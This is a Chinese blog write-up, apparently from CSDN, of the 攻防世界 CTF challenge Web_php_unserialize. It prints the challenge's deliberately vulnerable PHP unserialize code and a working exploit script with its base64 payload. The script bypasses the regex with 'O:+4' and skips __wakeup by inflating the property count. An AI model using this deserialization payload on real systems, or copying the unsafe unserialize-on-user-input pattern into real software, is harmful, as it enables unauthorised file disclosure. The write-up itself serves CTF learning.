[wp] 攻防世界 Web_php_unserialize

最新推荐文章于 2024-06-02 11:24:45 发布

MercyLin

最新推荐文章于 2024-06-02 11:24:45 发布

阅读量3.7w

点赞数 4

CC 4.0 BY-SA版权

分类专栏：网安文章标签： php反序列化

本文链接：https://blog.youkuaiyun.com/qq_40884727/article/details/101162105

网安专栏收录该内容

27 篇文章

订阅专栏

本文深入探讨了PHP代码审计过程中的关键点，包括如何绕过正则表达式匹配和序列化时的__wakeup方法，通过实例展示了具体的绕过脚本。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

先是一段代码审计:

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

看了一下主要是两个点:
1.preg_match(’/[oc]:\d+:/i’, $var)的绕过
2.unserialize时__wakeup的绕过
这里给出脚本,没有什么难点,就是两个小技巧:

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
    $A = new Demo('fl4g.php');
    $C = serialize($A);
    //string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}"
    $C = str_replace('O:4', 'O:+4',$C);//绕过preg_match
    $C = str_replace(':1:', ':2:',$C);//绕过wakeup
    var_dump($C);
    //string(49) "O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}"
    var_dump(base64_encode($C));
    //string(68) "TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ=="
?>

在这里插入图片描述